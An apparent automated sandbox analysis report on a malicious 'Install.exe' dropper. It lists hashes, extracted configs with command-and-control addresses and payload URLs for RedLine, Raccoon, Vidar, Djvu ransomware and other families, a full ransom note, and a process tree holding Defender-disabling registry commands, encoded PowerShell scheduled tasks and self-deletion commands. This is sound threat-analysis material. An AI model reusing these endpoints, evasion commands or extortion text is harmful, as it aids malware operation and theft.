Overview

overview

10

Static

static

Install.exe

windows7-x64

10

Install.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    609s
  • max time network
    635s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2022 14:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Install.exe

  • Size

    686.6MB

  • MD5

    880c7109a4ffab32d5a7cd316560c94d

  • SHA1

    368af163b48e4cadbff0e6d047fdbb478ae5e98a

  • SHA256

    00dc6c57001be3ad315b043bad76d4f85a0ceca41d7c04e9ddc8a97868c0f6c7

  • SHA512

    88165a8276cbfa716e878bd32b0e577415f63fab739ec4aba70d8ee9a3c6c59b6bbcddb04633f1d40e450af294313f3ba73e80c986cb43dea9f3543b6699a6a6

  • SSDEEP

    98304:wIqAG3I68EXaB4rRJFHMJ1ga4Um+BO2giMMHSbewc/l0v:mC2rRJFHMlNmSOliT5l0v

Score
10/10
dcratdjvunymaimprivateloaderraccoonredlinesmokeloadervidar11a17d9aed7a239440deb75d7a177f406517installnam6.7backdoorcollectiondiscoveryevasioninfostealerloadermainpersistenceransomwareratspywarestealertrojanupxvmprotect

Malware Config

Extracted

Family

privateloader

C2

http://163.123.143.4/proxies.txt

http://107.182.129.251/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

163.123.143.12

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php
Attributes
  • payload_url

    https://vipsofts.xyz/files/mega.bmp

Extracted

Family

nymaim

C2

208.67.104.97

85.31.46.167

Extracted

Family

redline

Botnet

nam6.7

C2

103.89.90.61:34589

Attributes
  • auth_value

    28e28fedd782927e1451d4153d874596

Extracted

Family

redline

Botnet

1

C2

79.110.62.196:35726

Attributes
  • auth_value

    4b711fa6f9a5187b40500266349c0baf

Extracted

Family

djvu

C2

http://winnlinne.com/lancer/get.php

Attributes
  • extension

    .adww

  • offline_id

    z8lhl4oForVEc7gy9Ra8rSqjYMl3xiFRuIW4not1

  • payload_url

    http://rgyui.top/dl/build2.exe

    http://winnlinne.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-g28rVcqA58 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0573Jhyjd

rsa_pubkey.plain

Extracted

Family

redline

Botnet

Install

C2

69.176.94.78:32244

Attributes
  • auth_value

    262df95952285ebeabc4c91774e37776

Extracted

Family

raccoon

Botnet

1a17d9aed7a239440deb75d7a177f406

C2

http://193.38.55.180/

rc4.plain

Extracted

Family

vidar

Version

54.9

Botnet

517

C2

https://t.me/larsenup

https://ioc.exchange/@zebra54
Attributes
  • profile_id

    517

Signatures

  • DcRat 26 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Detected Djvu ransomware 8 IoCs
  • Detects Smokeloader packer 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
    evasiontrojan
  • NyMaim

    NyMaim is a malware with various capabilities written in C++ and first seen in 2013.

    trojannymaim
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

    loaderprivateloader
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 6 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks BIOS information in registry 2 TTPs 5 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 23 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 45 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unexpected DNS network traffic destination 64 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 45 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 11 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 16 IoCs
  • Drops file in Program Files directory 43 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 34 IoCs
  • Checks SCSI registry key(s) 3 TTPs 48 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 48 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 24 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 23 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 4 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 46 IoCs
  • Suspicious use of SendNotifyMessage 10 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Users\Admin\Pictures\Minor Policy\_sCNwjOkHQX3sqbn0nDiP1_8.exe
      "C:\Users\Admin\Pictures\Minor Policy\_sCNwjOkHQX3sqbn0nDiP1_8.exe"
      2⤵
      • Executes dropped EXE
      PID:4368
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 4368 -s 476
        3⤵
        • Program crash
        PID:5072
    • C:\Users\Admin\Pictures\Minor Policy\2Uvl9dPxlz3iTlaHKD4Wdy9z.exe
      "C:\Users\Admin\Pictures\Minor Policy\2Uvl9dPxlz3iTlaHKD4Wdy9z.exe"
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1252
    • C:\Users\Admin\Pictures\Minor Policy\a8NMnczZkL2CUSjqaMXkJJ2r.exe
      "C:\Users\Admin\Pictures\Minor Policy\a8NMnczZkL2CUSjqaMXkJJ2r.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3400
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        PID:1520
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
          4⤵
            PID:34592
          • C:\Users\Admin\AppData\Local\Temp\Vvaibxippcifamuqjwcoachdatabase_s.exe
            "C:\Users\Admin\AppData\Local\Temp\Vvaibxippcifamuqjwcoachdatabase_s.exe"
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of SetThreadContext
            PID:78740
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
              5⤵
                PID:78888
              • C:\Users\Admin\AppData\Local\Temp\Vvaibxippcifamuqjwcoachdatabase_s.exe
                C:\Users\Admin\AppData\Local\Temp\Vvaibxippcifamuqjwcoachdatabase_s.exe
                5⤵
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:80084
            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
              4⤵
              • Executes dropped EXE
              PID:78792
        • C:\Users\Admin\Pictures\Minor Policy\iXfcIlAd3ZJGrv14imIIIMcq.exe
          "C:\Users\Admin\Pictures\Minor Policy\iXfcIlAd3ZJGrv14imIIIMcq.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4560
          • C:\Users\Admin\AppData\Local\Temp\7zS52ED.tmp\Install.exe
            .\Install.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4540
            • C:\Users\Admin\AppData\Local\Temp\7zS76D1.tmp\Install.exe
              .\Install.exe /S /site_id "525403"
              4⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks computer location settings
              • Drops file in System32 directory
              • Enumerates system info in registry
              PID:3536
              • C:\Windows\SysWOW64\forfiles.exe
                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                5⤵
                  PID:1652
                  • C:\Windows\SysWOW64\cmd.exe
                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    6⤵
                      PID:3004
                      • \??\c:\windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                        7⤵
                          PID:4900
                        • \??\c:\windows\SysWOW64\reg.exe
                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                          7⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4992
                    • C:\Windows\SysWOW64\forfiles.exe
                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                      5⤵
                        PID:4800
                        • C:\Windows\SysWOW64\cmd.exe
                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                          6⤵
                            PID:1120
                            • \??\c:\windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                              7⤵
                                PID:2176
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                7⤵
                                  PID:2564
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "gefCKfozy" /SC once /ST 06:05:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                              5⤵
                              • DcRat
                              • Creates scheduled task(s)
                              PID:3192
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /run /I /tn "gefCKfozy"
                              5⤵
                                PID:3744
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /DELETE /F /TN "gefCKfozy"
                                5⤵
                                  PID:3180
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fnHxZhZ.exe\" d8 /site_id 525403 /S" /V1 /F
                                  5⤵
                                  • DcRat
                                  • Drops file in Windows directory
                                  • Creates scheduled task(s)
                                  PID:16768
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "bGZpGlqvDNKjraWjlZ"
                                  5⤵
                                    PID:82232
                            • C:\Users\Admin\Pictures\Minor Policy\Wcv2ElQhsJitXreqtUgzPNuT.exe
                              "C:\Users\Admin\Pictures\Minor Policy\Wcv2ElQhsJitXreqtUgzPNuT.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious behavior: GetForegroundWindowSpam
                              PID:1380
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 456
                                3⤵
                                • Program crash
                                PID:3084
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 768
                                3⤵
                                • Program crash
                                PID:4924
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 776
                                3⤵
                                • Program crash
                                PID:216
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 780
                                3⤵
                                • Program crash
                                PID:1284
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 860
                                3⤵
                                • Program crash
                                PID:5056
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 984
                                3⤵
                                • Program crash
                                PID:4996
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 1028
                                3⤵
                                • Program crash
                                PID:23068
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 1368
                                3⤵
                                • Program crash
                                PID:80640
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\uo8K6Q7L380H\Cleaner.exe"
                                3⤵
                                  PID:109956
                                  • C:\Users\Admin\AppData\Local\Temp\uo8K6Q7L380H\Cleaner.exe
                                    "C:\Users\Admin\AppData\Local\Temp\uo8K6Q7L380H\Cleaner.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:7956
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 1368
                                  3⤵
                                  • Program crash
                                  PID:77688
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 1712
                                  3⤵
                                  • Program crash
                                  PID:79628
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "Wcv2ElQhsJitXreqtUgzPNuT.exe" /f & erase "C:\Users\Admin\Pictures\Minor Policy\Wcv2ElQhsJitXreqtUgzPNuT.exe" & exit
                                  3⤵
                                    PID:79844
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im "Wcv2ElQhsJitXreqtUgzPNuT.exe" /f
                                      4⤵
                                      • Kills process with taskkill
                                      PID:79928
                                • C:\Users\Admin\Pictures\Minor Policy\j91KjEiBGKY34pjHLHBViYoO.exe
                                  "C:\Users\Admin\Pictures\Minor Policy\j91KjEiBGKY34pjHLHBViYoO.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  • Drops file in Program Files directory
                                  • Suspicious use of WriteProcessMemory
                                  PID:2228
                                  • C:\Users\Admin\Documents\l18rjsLVFj3dRcfu912qdPGv.exe
                                    "C:\Users\Admin\Documents\l18rjsLVFj3dRcfu912qdPGv.exe"
                                    3⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2560
                                    • C:\Users\Admin\Pictures\Adobe Films\LDiYCdAhInSJ0aNbigPm3Fzi.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\LDiYCdAhInSJ0aNbigPm3Fzi.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:4692
                                      • C:\Windows\SysWOW64\at.exe
                                        at 3874982763784yhwgdfg78234789s42809374918uf
                                        5⤵
                                          PID:4444
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c cmd < Row.potx & ping -n 5 localhost
                                          5⤵
                                            PID:45892
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd
                                              6⤵
                                                PID:74420
                                                • C:\Windows\SysWOW64\tasklist.exe
                                                  tasklist /FI "imagename eq AvastUI.exe"
                                                  7⤵
                                                  • Enumerates processes with tasklist
                                                  PID:79180
                                                • C:\Windows\SysWOW64\find.exe
                                                  find /I /N "avastui.exe"
                                                  7⤵
                                                    PID:79208
                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                    tasklist /FI "imagename eq AVGUI.exe"
                                                    7⤵
                                                    • Enumerates processes with tasklist
                                                    PID:79272
                                                  • C:\Windows\SysWOW64\find.exe
                                                    find /I /N "avgui.exe"
                                                    7⤵
                                                      PID:79284
                                                    • C:\Windows\SysWOW64\findstr.exe
                                                      findstr /V /R "^WQlKwgWhizJI$" Admit.potx
                                                      7⤵
                                                        PID:79360
                                                      • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sink.exe.pif
                                                        Sink.exe.pif w
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:79388
                                                        • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sink.exe.pif
                                                          C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sink.exe.pif
                                                          8⤵
                                                            PID:81216
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping -n 5 localhost
                                                        6⤵
                                                        • Runs ping.exe
                                                        PID:79436
                                                  • C:\Users\Admin\Pictures\Adobe Films\I82rhBHO3x_j8ZDxihh0c8sM.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\I82rhBHO3x_j8ZDxihh0c8sM.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:4800
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell "" "Get-WmiObject Win32_PortConnector"
                                                      5⤵
                                                        PID:77176
                                                    • C:\Users\Admin\Pictures\Adobe Films\J4V9e4WqLq6X0oCyND5s66La.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\J4V9e4WqLq6X0oCyND5s66La.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      PID:4336
                                                      • C:\Users\Admin\Pictures\Adobe Films\J4V9e4WqLq6X0oCyND5s66La.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\J4V9e4WqLq6X0oCyND5s66La.exe" -q
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:35400
                                                    • C:\Users\Admin\Pictures\Adobe Films\9gZquTWtkZ4wBPbpW6p1XP48.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\9gZquTWtkZ4wBPbpW6p1XP48.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      • Modifies registry class
                                                      PID:988
                                                      • C:\Windows\SysWOW64\control.exe
                                                        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\0BYRGT.cPL",
                                                        5⤵
                                                          PID:4204
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\0BYRGT.cPL",
                                                            6⤵
                                                            • Loads dropped DLL
                                                            PID:25316
                                                            • C:\Windows\system32\RunDll32.exe
                                                              C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\0BYRGT.cPL",
                                                              7⤵
                                                                PID:77220
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\0BYRGT.cPL",
                                                                  8⤵
                                                                  • Loads dropped DLL
                                                                  PID:77304
                                                        • C:\Users\Admin\Pictures\Adobe Films\bFIXPvhCOme9VTC0ckq50R_b.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\bFIXPvhCOme9VTC0ckq50R_b.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Checks computer location settings
                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                          PID:1188
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 460
                                                            5⤵
                                                            • Program crash
                                                            PID:52528
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 776
                                                            5⤵
                                                            • Program crash
                                                            PID:74244
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 796
                                                            5⤵
                                                            • Program crash
                                                            PID:85384
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 796
                                                            5⤵
                                                            • Program crash
                                                            PID:119952
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 856
                                                            5⤵
                                                            • Program crash
                                                            PID:7844
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 856
                                                            5⤵
                                                            • Program crash
                                                            PID:17332
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 788
                                                            5⤵
                                                            • Program crash
                                                            PID:42044
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 1380
                                                            5⤵
                                                            • Program crash
                                                            PID:77716
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\lWUaeqLwj9SmQdjJwre1erdOq3284\Cleaner.exe"
                                                            5⤵
                                                              PID:77844
                                                              • C:\Users\Admin\AppData\Local\Temp\lWUaeqLwj9SmQdjJwre1erdOq3284\Cleaner.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\lWUaeqLwj9SmQdjJwre1erdOq3284\Cleaner.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:78100
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 1392
                                                              5⤵
                                                              • Program crash
                                                              PID:79020
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 1244
                                                              5⤵
                                                              • Program crash
                                                              PID:80752
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "bFIXPvhCOme9VTC0ckq50R_b.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\bFIXPvhCOme9VTC0ckq50R_b.exe" & exit
                                                              5⤵
                                                                PID:80804
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /im "bFIXPvhCOme9VTC0ckq50R_b.exe" /f
                                                                  6⤵
                                                                  • Kills process with taskkill
                                                                  PID:79616
                                                            • C:\Users\Admin\Pictures\Adobe Films\jTExQ1H76x8oxrucs4d70np7.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\jTExQ1H76x8oxrucs4d70np7.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:2040
                                                              • C:\Windows\system32\WerFault.exe
                                                                C:\Windows\system32\WerFault.exe -u -p 2040 -s 424
                                                                5⤵
                                                                • Program crash
                                                                PID:21116
                                                            • C:\Users\Admin\Pictures\Adobe Films\Vkag8Yt37EtknTb0h0nWJm2M.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\Vkag8Yt37EtknTb0h0nWJm2M.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              PID:3448
                                                              • C:\Windows\SysWOW64\at.exe
                                                                at 3874982763784yhwgdfg78234789s42809374918uf
                                                                5⤵
                                                                  PID:3796
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c cmd < Film.aspx & ping -n 5 localhost
                                                                  5⤵
                                                                    PID:43528
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd
                                                                      6⤵
                                                                        PID:74456
                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                          tasklist /FI "imagename eq AvastUI.exe"
                                                                          7⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:79228
                                                                        • C:\Windows\SysWOW64\find.exe
                                                                          find /I /N "avastui.exe"
                                                                          7⤵
                                                                            PID:79240
                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                            tasklist /FI "imagename eq AVGUI.exe"
                                                                            7⤵
                                                                            • Enumerates processes with tasklist
                                                                            PID:79316
                                                                          • C:\Windows\SysWOW64\find.exe
                                                                            find /I /N "avgui.exe"
                                                                            7⤵
                                                                              PID:79328
                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                              findstr /V /R "^otPcqYaF$" Deliver.aspx
                                                                              7⤵
                                                                                PID:79376
                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tanks.exe.pif
                                                                                Tanks.exe.pif A
                                                                                7⤵
                                                                                • Executes dropped EXE
